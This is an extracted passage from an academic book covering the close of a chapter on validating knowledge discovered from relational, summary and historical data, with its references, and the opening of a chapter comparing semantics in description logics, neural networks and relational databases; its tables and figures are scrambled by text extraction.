Table 5. Summary sales table based on Table 1 Product Glove Glove Hat Jacket
Product Color Blue Green Green Blue
Table 6. Summary sales table based on Table 1
Profit
Product
-300 1800 -800 6700
Glove Hat Jacket
Product Color Blue Green Blue
Profit 2000 300 -200
Table 7. Summary sales table based on Table 1 Product Glove Glove Hat Jacket
Second, there is also a possibility that information is lost or distorted as summary tables are created. For example, consider a retail data warehouse where Monday to Friday sales are exceptionally low for some stores, while weekend sales are exceptionally high for others. The summarization of daily sales data to weekly amounts will totally hide the fact that weekdays are “money losers,” while weekends are “money makers” for some stores. In other words, key pieces of information are often lost through summarization, and there is no way to recover them by further analysis. Finally, another key issue is the maintenance of the summary tables to keep them up to date, and ensuring that the summary tables are consistent with each other and the detailed data. Once the summary tables have been created, they need to be refreshed at regular intervals as the base data
Product Color Blue Green Green Blue
Profit -300 -200 -1100 6900
(detailed data) gets refreshed. We need to use an incremental scheme for maintaining summary tables efficiently (Barquin & Edelstein, 1997; Bischoff & Alexander, 1997).
Validating Possible Incorrect Discovered Knowledge As we showed in the previous section, knowledge discovery based on just the detailed tables may lead to incorrect discovery since the discovered knowledge is based on statistical significance. Such statistical significance represents the probability that is based on the occurrences of the records in which certain attributes satisfy some specific conditions. Summary tables have hidden patterns that can be discovered. Such patterns provide the relationships between certain attri-
247
Discovering Quality Knowledge from Relational Databases
Table 8. Sample sales data Product Jacket Jacket Jacket Hat Hat Hat Glove Glove Glove
Product Color Blue Blue Blue Green Green Green Green Blue Green
Product Price 200 200 200 70 70 70 50 50 50
butes based on their actual values as well as on the statistical significance. Therefore, we propose to use the patterns discovered from the summary tables to validate the discovered knowledge from the detailed tables. Our proposed scheme identifies the following cases for validating possible incorrect/correct discovered rules. •
Case 1: If the discovered pattern from the summary tables completely supports the discovered knowledge from the detailed tables, then we have more confidence on the accuracy of the discovered knowledge. For instance, consider Table 8, where the third row in Table 2 is changed such that profit = -100. From Table 8 we can discover that: If Product Color = Blue Then Profitable =No CF=100% (4 records out of 4)
By looking at Table 9, which is a summary table based on Table 8, we can discover that Blue color product provides no profit (negative profit). So, the detailed and summary tables produce the same results. Subsequently, we have more confidence in the discovered knowledge.
Table 9. Summary sales table based on Table 1 Product Color Blue Green
•
Profit -700 1000
Case 2: The patterns discovered from the detailed and summary tables support each other, but they have different confidence factors. For example, from Table 2, we discover that: If Product Color = Blue Then Profitable = No CF=75% (3 records out of 4).
From Table 4, we discover that Blue color product is not profitable (CF = 100%, Profit = -500). Since the discovered patterns on the summary tables are based on the actual values, they represent more reliable information compared to the discovered patterns from the detailed tables which are based on the occurrences of the records.
Discovering Quality Knowledge from Relational Databases
In such cases, we cannot say that the discovered pattern is incorrect, but rather it is not detailed enough to be considered as an interesting pattern. Perhaps the hypothesis for discovering the pattern has to be expanded to include other attributes (i.e., Product or Store Size or both) in addition to the Product Color. •
Case 3: The patterns discovered from the detailed and summary tables contradict each other. For example, from Table 1, we discover that: If Product Color = Blue Then Profitable = No CF=75% (3 records out of 4).
From Table 3, we discover that the Blue color product is profitable (CF = 100%, Profit = 6400). The explanation is the same as the one provided for case 2.
Incomplete Knowledge Discovery The traditional database design method is based on the notions of functional dependencies and lossless decomposition of relations into third normal forms. However, this decomposition of relation is not useful with respect to knowledge discovery because it hides dependencies among attributes that might be of some interest (Adriaans &
Zantinge, 1996). To provide maximum guarantee that potentially interesting statistical dependencies are preserved, knowledge discovery process should use the universal relation (Chiang, Barron, & Storey, 1994; Date, 2000; Maier, 1983; Parsaye & Chignell, 1999) as opposed to normalized relations. In the following example, we show that knowledge discovery on a normalized relations may not reveal all the interesting patterns. Consider the relations Sales and Region (Adriaans & Zantinge, 1996) in Figure 3 which are in third normal form. Figure 4 shows the universal relation which is the join of the two tables in Figure 3. From Figure 4, we can discover a relationship between the Average Price of the House and the type of Products Purchased by people. Such relationship is not that obvious on the normalized relations in Figure 3. This example shows that knowledge discovery on “well designed” (i.e., 3NF) databases, according to the normalization techniques, could lead to incomplete knowledge discovery.
Validating Possible Incomplete Discovered Knowledge Every decomposition involves a potential information loss that has to be analyzed and quantified, and traditional techniques from statistics and machine learning (minimum description length)
Figure 3. Relational database in third normal form Sales Client Number
Region Zip Code
Product Purchased
1111
11111
Wine
2222
22222
Bread
3333
11111
Wine
4444
33333
Wine
5555
44444
Wine
Zip Code
City
Average House Price High
11111
Paris
22222
Peking
Low
33333
New York
High
44444
Moscow
High
249
Discovering Quality Knowledge from Relational Databases
Figure 4. Universal relation, join of the tables in Figure 3 Sales / Region Client Number
Zip Code
Average House Price
Product Purchased
11111
11111
Paris
High
Wine
22222
22222
Peking
Low
Bread
33333
11111
Paris
High
Wine
44444
33333
New York
High
Wine
5555
44444
Moscow
High
Wine
can be used (Adriaans & Zantinge, 1996). The chance of having complete/incomplete knowledge discovery depends on the discovery process. If knowledge the discovery process uses the universal relation, then we could provide maximum guarantee that potentially interesting statistical dependencies are preserved. In case of the normalized relations, it depends on how the discovery process is performed on multiple relations. For instance, if the discovery process works on relations independently, then we may never discover a relationship between Average House Price and the Product Purchased in the relations of Figure 3. For validating the completeness/incompleteness of the discovered knowledge, we propose to analyze the discovered rules (known as statistical dependencies) with the available functional dependencies (known as domain knowledge). If new dependencies are generated that are not in the set of discovered rules, then we have an incomplete knowledge discovery. For example, processing the Sales relation in Figure 3, we may discover that if Zip Code=11111 then Product Purchased = Wine with some confidence. We call this a statistical dependency that indicates a correlation (with some confidence) between the Zip Code and the Product Purchased by people. Now, consider the Region
250
City
relation in Figure 3, where the given dependencies are Zip Code → City and City → Average House Price which gives the derived new functional dependency Zip Code → Average House Price due to the transitive dependency. By looking at the discovered statistical dependency and the new derived (or a given dependency in general), one may deduce a relationship between the Average House Price and the Product Purchased (with some confidence). If our discovery process does not generate such a relationship, then we have an incomplete knowledge discovery that is the consequence of working on normalized relations as opposed to universal relations. The main issue in the validation process is then to generate all the statistical dependencies. Foreign key detection algorithms used in reversed engineering of databases along with a special query mechanism can be used to detect statistical dependencies (Adriaans & Zantinge, 1996). As we noted, to provide maximum guarantee that potentially interesting statistical dependencies are preserved, the knowledge discovery process should use the universal relation (Chiang et al., 1994) as opposed to normalized relations. However, we should be careful when processing a universal relation since it could mistakenly lead to discovering a known fact (i.e., a func-
Discovering Quality Knowledge from Relational Databases
tional dependency, or FD). Note that, when we denormalize the relations (join them) to create the universal relation, we will have redundancies due to the functional dependencies among attributes. For example, consider the universal relation Sales/Regions in Figure 4. A discovery system may discover that:
1.
If Zip Code = 11111 Then City = Paris If City = Paris Then AverageHousePrice = High The above rules indicate relationships between Zip Code and City, and between City and AverageHousePrice. These relationships, however, do not represent new discovery since they are in fact the given functional dependencies which are true.
USING HISTORICAL DATA FOR KNOWLEDGE DISCOVERY Knowledge discovery from operational/detailed or summary data alone may not reveal trends and long-term patterns in data. Historical data should be an essential part of any discovery system in order to discover patterns that are correct over data gathered for a number of years as well as the current data. For example, we may discover from current data a pattern indicating an increase in student enrollment in the universities in the Washington, DC area (perhaps due to good Economy). Such a pattern may not be true when we look at the last five years of data. There are several schemes that could be identified in using historical data in order to improve the overall knowledge discovery process. In the following, we propose schemes that could help us to detect undiscovered patterns from detailed and summary data, and to validate the consistency/accuracy/completeness of the discovered patterns from the detailed/summary data.
2.
Validate discovered knowledge from detailed/summary data against historical data: We can apply the discovered rules from detailed and/or summary data to the historical data to see if they hold. If the rules are strong enough, they should hold on the historical data. A discovered rule is inconsistent with the database if examples in the database exist that satisfy the condition part of the rule, but not the conclusion part (Giarrantanto & Riley, 1989; Keller, 1994). A knowledge base (i.e., set of discovered rules from detailed and summary data) is inconsistent with the database if there is an inconsistent rule in the knowledge base. A knowledge base is incomplete with respect to the database if examples exist in the database that do not satisfy the condition part of any consistent rule. If there are inconsistent rules, we have some historical data that contradict the rules discovered from detailed/summary data. It means we may have anomalies in some of the historical data. This is the case where any knowledge from external data, domain expert, and/or domain knowledge could be used to verify the inconsistencies. Similarly, if we have an incomplete knowledge base, some historical data could represent new patterns or some anomalies. Again, additional information (i.e., domain expert) is necessary to verify that. Compare the rules discovered from detailed/summary data with the ones from historical data: We perform the knowledge discovery on the historical data and compare the rules discovered from the historical data (call it H_RuleSet) with the ones discovered from detailed/summary data (call it DS_RuleSet). There are several possibilities: a. If H_RuleSet ∩ DS_RuleSet = ∅, then none of the rules discovered from
251
Discovering Quality Knowledge from Relational Databases
b.
c.
detailed/summary data hold on the historical data. If H_RuleSet ∩ DS_RuleSet = X, then: • If DS_RuleSet - X = ∅, then all of the rules discovered from detailed/summary data hold on the historical data. • If X ⊂ DS_RuleSet, then there are some rules discovered from detailed/summary data that do not hold on the historical data (i.e., N_RuleSet - X). We can find the data in the historical data that do not support the rules discovered from the detailed/summary data by finding the data that support the rules in N-RuleSet and subtract them from the entire historical data. This data can then be analyzed for anomalies. If H_RuleSet - DS_RuleSet != ∅ (or DS_RuleSet ⊂ X), then there are some rules discovered from historical data that are not in the set of rules discovered from the detailed/summary data. This means we discovered some new patterns.
CONCLUSION AND FUTURE DIRECTION Current database technology involves processing a large volume of data in databases in order to discover new knowledge. Most of the knowledge discovery process has been on the operational (most recent) data. Knowledge discovery on just the detailed/recent data does not reveal all patterns that exist in the organizational data nor could it be consistent/accurate. We showed that rule discovery in operational relational databases could lead to incomplete and
252
inaccurate discovery. Relational databases are normalized in order to prevent update anomalies. In addition, operational databases contain mainly the most recent/detailed data. We need an environment where the detailed data as well as the summary and historical data are provided in order to have an effective discovery process. We showed how the discovered patterns from summary data can be used to validate the discovered patterns from the detailed operational data. Also, we described the process for using the discovered patterns from the historical data to validate the patterns discovered from the detailed/summary data. We have done some manual testing of the proposed schemes for detecting the anomalies on the discovered rules. The IDIS (2000) knowledge discovery tool was used on a PC on dataset related to the accident with fatality (we used the data available in the U.S. Department of Transportation). We used the detailed data as well as the summarized data. We should note that the IDIS tool discovered a lot of trivial, inaccurate, inconsistent rules on both the detailed and summarized data. We manually checked the results from the two sets of data. The initial results indicate that we are able to detect anomalies on the discovered rules using the schemes provided in this chapter. Once implemented, this validation tool can be connected to a discovery tool. Then, the generated rules from the discovery tool are given to our validation tool for further processing. The results from the validation tool can be made available to the discovery tool to refine its discovery process. There are several issues/concerns that need to be addressed before we could have an effective knowledge discovery process in databases. The following are some of the main issues. 1.
A major issue is the size of the databases, which are getting bigger and bigger (Chattratichat, Darlington, & Ghahem, 1997). The
Discovering Quality Knowledge from Relational Databases
2.
3.
larger a database, the richer its patterns; and as the database grows, the more patterns it includes. However, after a point, if we analyze “too large” a portion of a database, patterns from different data segments begin to dilute each other and the number of useful patterns begins to decrease (Parsaye, 1997). To find useful patterns in a large database, we could select segments to data that fit a particular discovery objective, prepare it for analysis and then perform data discovery. As we segment, we deliberately focus into a subset of the data (i.e., a particular medication for a disease), sharpening the focus of the analysis. Alternatively, data sampling can be used for faster data analysis (Kivinen & Mannila, 1994). However, when we sample data, we lose information because we throw away data not knowing what we keep and what we ignore. Summarization may be used to reduce data sizes; although, it can cause problems too, as we noted. Currently, we are trying to define criteria which one could use to manage the large volume of data in the KDD process. Traditionally, most of the data in a database has come from internal operational systems such as order entry, inventory, or human resource data. However, external sources (i.e., demographic, economic, point-of-sale, market feeds, and Internet) are becoming more and more prevalent and will soon be providing more content to the data warehouse than the internal sources. The next question is how we process these external sources efficiently to retrieve relevant information and discover new knowledge that could explain the behavior of the internal data accurately. We are investigating this aspect of the KDD. While promising, the available discovery schemes and tools are limited in many ways. A major restriction of these tools/techniques
4.
is that most of them operate on a single data relation to generate the rules. Many existing databases, however, are not stored as single relations, but as several relations for reasons of nonredundancy or access efficiency. For databases with several interrelated relations, the relevant data relations are to be joined in order to create a single relation, called a universal relation (UR) (Date, 2000; Maier, 1983). As we mentioned before, a UR could reveal more interesting patterns. However, from a data mining point of view, this could lead to many issues such as universal relations of unmanageable sizes, infiltration of uninteresting attributes, and inconveniences for distributed processing. Currently, we are considering the problem of knowledge discovery in multirelation databases (Ribeiro, Kaufman, & Kerschberg, 1995; Wrobel, 1997; Yoon & Kerschberg, 1993; Zhong & Yamashita, 1998). Finally, current discovery tools, such as IDIS (2000), produce rules that are at times inaccurate, incomplete, inconsistent, and trivial. Our future plan is to study the implementation of the processes (algorithms) defined in this chapter for validating (or detecting) the consistency, accuracy, and completeness of the discovered rules.
REFERENCES Adriaans, P., & Zantinge, D. (1996). Data mining. Reading, MA: Addison-Wesley. Agrawal, R., Imielinski, T., & Swami, A. (1993). Database mining: A performance perspective. IEEE Transactions on Knowledge and Data Engineering, 5(6), 914-925. Barquin, R., & Edelstein, H. A. (1997). Building, using, and managing the data warehouse. Upper Saddle River, NJ: Prentice Hall PTR.
253
Discovering Quality Knowledge from Relational Databases
Berry, M., & Linoff, G. (2000). Mastering data mining. New York: John Wiley & Sons.
knowledge from volumes of data. Communications of the ACM, 39, 27-33.
Bischoff, J., & Alexander, T. (1997). Data warehouse: Practical advise from the expert. Upper Saddle River, NJ: Prentice Hall.
Fayyad, U., Piatetsky-Shapiro, G., & Symth, P. (1996b, August 2-4). Knowledge discovery and data mining: Towards a unifying framework. In Proceedings of the Second International Conference on Knowledge Discovery and Data Mining, Portland, OR (pp. 82-88).
Brachman, R. J., & Anand, T. (1996). The process of knowledge discovery in databases. In U. M. Fayyad, G. Piatetsky-Shapiro, & P. Symth (Eds.), Advances in knowledge discovery and data mining (pp. 37-57). Menlo Park, CA: AAAI Press/The MIT Press. Brachman, R. J., Khabaza, T., Kloesgen, W., Piatetsky-Shapiro, G., & Simoudis, E. (1996). Mining business databases. Communications of the ACM, 39, 42-28. Bradley, P., Gehrke, J., Ramakrishnan, R., & Srikant, R. (2002). Scalling mining algorithms to large databases. Communications of the ACM, 45(8), 38-43. Chattratichat, J., Darlington, J., & Ghahem, M. (1997, August 14-17). Large scale data mining: Challenges and responses. In Proceedings of the 3rd International Conference on Knowledge Discovery and Data Mining, Newport Beach, CA (pp. 143-146). Chiang, R. H. L., Barron, T. M., & Storey, V. C. (1994, July 31-August 4). Extracting domain semantics for knowledge discovery in relational databases. In Proceedings of the AAAI Workshop on Knowledge Discovery in Databases, Seattle, WA (pp. 299-310). Date, C. J. (2000). An introduction to database systems (7th ed.). Reading, MA: Addison-Wesley. Fayyad, U. (1996). Data mining and knowledge discovery: Making sense out of data. IEEE Expert, 11, 20-25. Fayyad, U., Piatetsky-Shapiro, G., & Symth, P. (1996a). The KDD process for extracting useful
254
Fayyad, U., Piatetsky-Shapiro, G., & Symth, P. (1996c). From data mining to knowledge discovery: An overview. In U. Fayyad, G. Piatetsky-Shapiro, & P. Symth (Eds.), Advances in knowledge discovery and data mining (pp. 1-34). Menlo Park, CA: AAAI/MIT Press. Fayyad, U., & Uthurusamy, R. (2002). Evolving data mining into solution for insights. Communications of the ACM, 45(8), 28-31. Frawley, W. J., Piatetsky-Shapiro, G., & Matheus, C. J. (1992). Knowledge discovery in databases: An overview. AI Magazine, 14(3), 57-70. Ganti, V., Gebrke, J., & Ramakrishnan, R. (1999). Mining very large databases. IEEE Computer, 32(8), 38-45. Giarrantanto, J., & Riley, G. (1989). Expert systems: Principles and programming. Boston: PWS-Kent Publishing Company. Groth, R. (1998). Data mining: A hands-on approach for business professionals. Englewood Cliffs, NJ: Prentice Hall. Han, J., & Kamber, M. (2000). Data mining: Concepts and techniques. San Francisco: Morgan Kaufmann. Hand, D., Mannila, H., & Smyth, P. (2001). Principles of data mining. Cambridge, MA: MIT Press. IDIS. (2000). The information discovery system user’s manual. Los Angeles: IntelligenceWare.
Discovering Quality Knowledge from Relational Databases
Inmon, W. H. (1996). The data warehouse and data mining. Communications of the ACM, 39, 49-50. John, G. H., & Langley, P. (1996, August 2-4). Static versus dynamic sampling for data mining. In Proceedings of the 2nd International Conference on Knowledge Discovery and Data Mining, Portland, OR (pp. 367-370). Keller, R. (1994). Expert system technology: Development and application. New York: Yourdon Press. Keyes, J. (1990, February). Branching to the right system: Decision-tree software. AI EXPERT, 61-64. Kivinen, J., & Mannila, H. (1994, May). The power of sampling in knowledge discovery. In Proceedings of the 1994 ACM SIGACT-SIGMOD-SIGACT Symposium on Principles of Database Theory (PODS’94), Minneapolis, MN (pp. 77-85). Maier, D. (1983). The theory of relational databases. Potamac, MD: Computer Science Press. Matheus, C. J., Chan, P. K., & Piatetsky-Shapiro, G. (1993). Systems for knowledge discovery in databases. IEEE Transactions on Knowledge and Data Engineering, 5(6), 903-913. Meredith, M. E., & Khader, A. (1996, June). Designing large warehouses. Database Programming & Design, 9(6), 26-30. Parsaye, K. (1996, September). Data mines for data warehouses. Database Programming & Design, 9(Suppl). Parsaye, K. (1997, February). OLAP & Data mining: Bridging the gap. Database Programming & Design, 10(2), 31-37. Parsaye, K. (1998, September). Small data, small knowledge: The pitfalls of sampling and summarization. Information Discovery Inc. Retrieved April 6, 2006, from http://www.datamining. com/datamine/ds- start1.htm
Parsaye, K., & Chignell, M. (1999). Intelligent database tools and applications: Hyperinformation access, data quality, visualization, automatic discovery. New York: John Wiley & Sons. Piatetsky-Shapiro, G. (1991). Discovery, analysis, and presentation of strong rules. Knowledge Discovery in Databases, 229-247. Menlo Park, CA: AAAI Press. Piatetsky-Shapiro, G., & Matheus, G. (1994, July). The interestingness of deviations. In Proceedings of the AAAI-94 Workshop on KDD, Seattle, WA (pp. 25-36). Ribeiro, J. S., Kaufman, K. A., & Kerschberg, L. (1995, June 7-9). Knowledge discovery from multiple databases. IASTED/ISMM International Conference, Intelligent Information Management Systems, Washington, DC. Sarawagi, S., Thomas, S., & Agrawal, R. (1998). Integrating association rule mining with relational database systems: Alternatives and implications. ACM SIGMOD Record, 27(2), 343-354. Savasere, A., Omiecinski, E., & Navathe, S. (1995). An efficient algorithm for mining association rules in large databases. In Proceedings of the 21st International Conference on Very Large Data Bases (pp. 432-444). San Fransisco: Morgan Kaufmann. Silberschatz, A., & Tuzhilin, A. (1995, August 20-21). On subjective measures of interestingness in knowledge discovery. In Proceedings of the 1st International Conference on Knowledge Discovery and Data Mining, Montreal, Quebec, Canada. Simoudis, E. (1996). Reality check for data mining. IEEE Expert, 11, 26-33. Smyth, P., Pregibon, D., & Faloutsos, C. (2002). Data driven evolution of data mining algorithms. Communications of the ACM, 45(8), 33-37.
255
Discovering Quality Knowledge from Relational Databases
Uthurusamy, R. (1996). From data mining to knowledge discovery: Current challenges and future directions. In U. M. Fayyad, G. PiatetskyShapiro & Symth, P. (Ed.), Advances in knowledge discovery and data mining (pp. 561-569). Menlo Park, CA: AAAI Press/The MIT Press. Wrobel, S. (1997). An algorithm for multi-relational discovery of subgroups. In J. Komorowsk &. J. Zytkow (Eds.), Principles of data mining and knowledge discovery (LNAI 1263, pp. 367-375). Springer-Verlag.
databases IEEE Transactions on Knowledge and Data Engineering, 5(6), 973-979. Zhong, N., & Yamashita, S. (1998, May 27-30). A way of multi-database mining. In Proceedings of the IASTED International Conference on Artificial Intelligence and Soft Computing, Cancun, Mexico (pp. 384-387). Ziarko, W. (1991). The discovery, analysis, and presentation of data dependencies in databases. Knowledge Discovery in Databases, 195-209. Menlo Park, CA: AAAI/MIT Press.
Yoon, J. P., & Kerschberg, L. (1993). A framework for knowledge discovery and evolution in
This work was previously published in Information Quality Management: Theory and Applications, edited by L. Al-Hakim, pp. 51-70, copyright 2007 by IGI Publishing, formerly known as Idea Group Publishing (an imprint of IGI Global).
256
257
Chapter 1.19
Approaches to Semantics in Knowledge Management Cristiano Fugazza University of Milan, Italy Stefano David Polytechnic University of Marche, Italy Anna Montesanto Polytechnic University of Marche, Italy Cesare Rocchi Polytechnic University of Marche, Italy
ABSTRACT There are different approaches to modeling a computational system, each providing different semantics. We present a comparison among different approaches to semantics and we aim at identifying which peculiarities are needed to provide a system with uniquely interpretable semantics. We discuss different approaches, namely, Description Logics, Artificial Neural Networks, and relational database management systems. We identify classification (the process of building a taxonomy) as common trait. However, in this chapter we also argue that classification is not enough to provide a system with a Semantics,
which emerges only when relations among classes are established and used among instances. Our contribution also analyses additional features of the formalisms that distinguish the approaches: closed versus. open world assumption, dynamic versus. static nature of knowledge, the management of knowledge, and the learning process.
INTRODUCTION The growing demand for information and knowledge management is pushing research efforts in computer science towards the development of technologies that allow massive amounts of
data to be automatically processed and stored, for the user to dispose of them. In areas like SW (Semantic Web) applications, KR (Knowledge Representation), RDBMS (Relational Database Management Systems), and logic-based systems, research has led, during the last decade, to impressive advances in the creation and the implementation of applications that facilitate the management of knowledge. The availability of such an enormous amount of information also resulted in the necessity to develop systems with the ability to integrate information that originate from heterogeneous sources and organize them into a single source.1 On the one hand, these systems allow for not only data storage and retrieval, but also additional logic-based processing, like checking consistency of data; on the other hand, they require to combine different data storage systems (e.g., different database instances) or even different interpretation paradigms (e.g., relational calculus, logical formalisms, or the structure underlying neural networks). Particularly, the integration of heterogeneous data sources poses challenges when their storage systems differ in their underlying semantics, that is, when their logical interpretations do not adhere to the same paradigm. As an example, consider independent organizations collaborating in the EE (Extended Enterprise): the capability of combining into a single data source the data stored in a relational database and the axioms that constitute a KB (Knowledge Base) may represent a striking advantage on the market or industry. In this situation, before starting the integration process, it is necessary to have a clear sense of how to correctly join the semantics of the different sources. The purpose of this chapter is to introduce three popular approaches to knowledge representation, underpinned by different semantics, to show in what they differ, and to present two alternative approaches to the problem of information integration. Particularly, we will focus on the notion of semantics and on the different features that
258
contribute to the notion of semantics for each of the approaches described in this chapter. A good explanation of the concept of semantics in the various approaches requires some introductory knowledge of basic logical formalisms, like propositional and predicate logics. In order to explain how different can result the representation of the same domain and data in different formalisms, we define a sample scenario that will be developed and represented in the distinct formalisms in the next sections. This chapter is organized as follows. First, we describe a sample scenario that we will use to show differences among the chosen formalisms; then we present the formalisms, starting with elementary notions of propositional and predicate logic and, continuing with the introduction of some concepts in RDBMS, ANNs, and DLs theories. We accompany the theories with explanations on how to consider the features of each formalism and how they lead to different interpretations of the scenario. Finally, we describe two popular integration efforts among different formalisms, namely optimization of query answering in DLs, exploiting RDBMS storage with DL-Lite and OWA/CWA integration with hybrid reasoning.
A SAMPLE SCENARIO The scenario we will illustrate is the trading of goods; it involves companies, products, articles, markets, and consumers. We introduce these concepts in order to sketch our sample scenario; they will be represented in the different approaches with the addition of instance data to populate the schema. The main categorization defined by the example is the one distinguishing among different kinds of enterprises. A company is a generic entity that provides something (e.g., a service, a product, or another type of goods). Manufacturer, distributor, and reseller are further categorizations of company, while the concept suppliers
Approaches to Semantics in Knowledge Management
denote the union of distributors and resellers. A product is produced by a manufacturer, is sold by a reseller, and is distributed in a specific market by a distributor. An article is a product which is made by the business entity under consideration (e.g., the manufacturer owning the knowledge base), as opposed to a generic, possibly competing, company. As for a generic product, an article has a name, a sale price, and it is distributed in a target market, a further categorization of market. Finally, a consumer is someone who buys an article. In the following of this chapter, it will be clear that not all approaches to data modeling can express these entities in such a way that, when executing queries over the KB, the result can be expected as correct. This is primarily due to the fact that traditional data structures (e.g., those expressed by relational databases all around the world) typically represent entities that can be exhaustively described and enumerated by the business entity hosting the system. Instead, wherever external data structures defined by third parties are instantiated in the KB, relational databases may fall short of expressing incomplete data structures in a consistent way.
A PRIMER ON SEMANTICS OF DATA STRUCTURES Recently, there has been a growing interest in the notion of semantics. Probably pushed forward by the development of the SW, many researchers in computer science have (re)started investigating the field of semantics. Such a notion has been already widely investigated in many fields like linguistics, philosophy, and logic. Following the analytic stream as conceived in Russell (1908) and Frege (1918), the concept of semantics in philosophy evolved in formal terms until Montague provided a formalization (Montague, 1974), which is broadly accepted in the field of logic-based linguistic studies. In philosophy, a less formal trend brought to the definition of semantics in terms of
“correspondence to the world” (Wittgenstein), an approach influenced by the formal work of Tarsky about the notion of truth. Meanwhile, the work in cognitive psychology explored the human process of categorization and classification, which led to the development of models, inspired by formal models in logic, but more focused on representational issues (frames, etc.). In Balkenius and Gärdenfors (1991), the authors show that, by developing a high-level description of the properties of neural networks, it is possible to bridge the gap between the symbolic and the subsymbolic levels (Smolensky, 1993). We can make the connection between the approaches closer by providing a different interpretation of the structure of a neural network. Balkenius and Gärdenfors introduce the notion of schema as the key concept for this construction. A schema is neutral with respect to the different views of cognition and have been used in both fields (Balkenius, 1993). Moreover, Balkenius uses the term “schema” as a collective name for the structure used in the works of Piaget (1952), Piaget and Inhelder (1973), Rumelhart and McClelland (1986), and Arbib and Hanson, (1987), also including concepts such as Frames (Minsky, 1986) and Scripts (Schank & Abelson, 1977). Nowadays, the concept of semantics is involved in many research fields: natural language processing, Semantic Web, knowledge representation, and medical informatics. Our purpose is to analyse the notion of semantics in different approaches adopted in the design and implementation of computer systems. We consider three approaches to domain modeling: RDBMS, ANNs (Artificial Neural Networks), and DLs (Description Logic). RDBMS and DLs are grounded in the theory of propositional logic and its connectives: AND, OR, and NOT, with the addition of universal (∀x) and existential (∃x) quantification of variables from predicate logic, while some particular type of ANNs (McCulloch and Pitts, 1943) can express connectives of propositional logic. However, despite their common groundwork, these approaches
259
Approaches to Semantics in Knowledge Management
have evolved in different directions and are usually employed in fairly different application fields and with heterogeneous purposes. Research and discussion in the fields of RDBMS, ANN, and DL cannot abstract from the diverse notions of semantics they express. In this chapter, we closely look at each approach, highlighting peculiarities and common traits. After a brief introduction to the theoretical background of propositional and predicate logic, we first consider the relational approach of RDBMS , which allows fast retrieval of structured data via queries over tables. This approach, where data are organized in terms of homogeneous tuples (i.e., records with the same number and type of attributes), is by far the most widely adopted architecture for data storage. The second approach we consider is represented by ANN, which has a fairly different and peculiar approach to the modeling of a domain, exploiting a necessary initial learning phase in order to train the ability of the ANN to classify input data. Finally, DL is a well-known approach in the knowledge representation field and uses logic tools (subsumption, consistency, and satisfiability) to implement reasoning over structured data. Such an approach finds its roots in logical formalisms and exploits a clear definition of semantics, often expressed in terms of model theory. In order to compare the several approaches, we identified a small number of features that unequivocally determine the semantics conveyed by a specific representation formalism; specifically: •
•
260
static versus. dynamic nature of the structural description of data items (e.g., the relational schema in RDBMS); closed versus. open world assumption when answering queries (i.e., considering the knowledge conveyed by the system as, respectively, complete or incomplete);
•
• •
management of implicit knowledge (i.e., whether the system comprises knowledge not explicitly stated in its memory configurations); need for a learning phase; classification.
After introducing the distinct notions of semantics suggested by RDBMS, ANN, and DL, we will look at two examples of integration efforts between distinct approaches. Firstly, we claim that, in particular situations, even a well-designed RDBMS may fail to retrieve all the correct answers to a query. This happens because the semantics of the relational model is only capable of expressing complete (i.e., exhaustive) knowledge while some data structures are to be considered incomplete. On the other hand, the unparalleled performance of RDBMS when answering queries makes it difficult to implement DL systems that are equally fast. Trying to bridge this gap, we introduce a very simple DL that allows for taking advantage of RDBMS as the storage facilities, for instance data while retaining the open-world approach of DL to express incomplete data structures. Moreover, we will show that modern computer applications (especially those intended to manage data in the EE) quite often need to integrate the different interpretations of a knowledge base. Specifically, proprietary data structures that may be correctly expressed with RDBMS schemata are often extended with data structures defined and populated by third parties (e.g., individual companies in the EE scenario) that cannot be expressed by the relational model; on the contrary, only applications complying with the model-theoretic approach of DL (e.g., DL reasoners) can process this category of data structures correctly. Consequently, we tackle the problem of integrating distinct approaches into a hybrid system that is capable of processing both complete and incomplete knowledge.
Approaches to Semantics in Knowledge Management
KNOWLEDGE REPRESENTATION PARADIGMS AND ASSOCIATED SEMANTICS Basic Logic Formalism We introduce here some basic notion of logic formalisms. For more advanced reading, please refer to (Kelly, 1997). Propositional Logic. Propositional logic is a formalism that allows one to assign a truth value to formulæ, that are structures composed of atomic propositions and connectives. An atomic proposition is basically a sentence, considered as a whole and not dividable, which we want to assign a truth value to. For example: ACME Corp. is a manufacturer. All products are sold in some market. Connectives are symbols that allow to link propositions to build formulæ. The basic connectives are conjunction (AND) and disjunction (OR), which are binary operators, and negation (NOT), which is a unary operator. There are additional connectives in the theory of propositional logic (implication and equivalence), but since they are expressible by means of the three basic connectives, we do not consider them here. A truth value is an assignment of truth, either “true”(T) or “false” (F) to an atomic proposition, that is, a declaration that a proposition is true or false. In order to evaluate the truth value of a formula, all statements and connectives must be evaluated. The NOT inverts the truth value of the statement it is applied to, but how to determine the truth value of a formula containing AND or OR connectives? The former assigns to the formula a value of “true” if all propositions are true, and the latter if at least one of the propositions is true. Propositional logic also allows for a basic reasoning service, called entailment or logical implication, which amounts to answering the following question: Given a knowledge base
Σ, which is a set of atomic propositions and/or formulæ, can a proposition α be derived by the knowledge base? If this happens, then Σ is also called model of α, i.e., a model is an interpretation that is always true. Moreover, if the knowledge base logically implies true, then it is said to be satisfiable. In order to avoid that reasoning produces wrong results, reasoning should satisfy two properties: 1. 2.
Soundness: All propositions derived are true and no false proposition can be derived. Completeness: All possible propositions that can be derived are given in output.
There are two main possibilities to check if entailment (and, in general, any reasoning service,) is sound and complete: 1) enumerating and evaluating all possible truth assignments of the knowledge base and of the derived statements; and 2) using tableaux calculus, a procedure that helps constructively to build a model for the knowledge base. The enumeration of all truth assignments of a knowledge base can become very long and complex if there are many statements: a single proposition can have two truth assignments; two propositions can have four truth assignments, and so on. In a generic knowledge base with n statements, there are 2n possible truth assignments. On the other side, tableaux calculus is based on the idea of incrementally building a model for the knowledge base, using rules to decompose formulæ into their components and to create a tree-like structure whose branches either end with a clash, which indicates that such a truth assignment contains contradictory statements (therefore it is not a model for the knowledge base), or are closed, meaning that the truth assignment is a model for the knowledge base. Predicate Logic. In propositional logic it is possible to state whether an atomic proposition or a formula is true or false, but there is no possibility, neither to state the truth value of a set of statements, nor to describe the internal structure
261
Approaches to Semantics in Knowledge Management
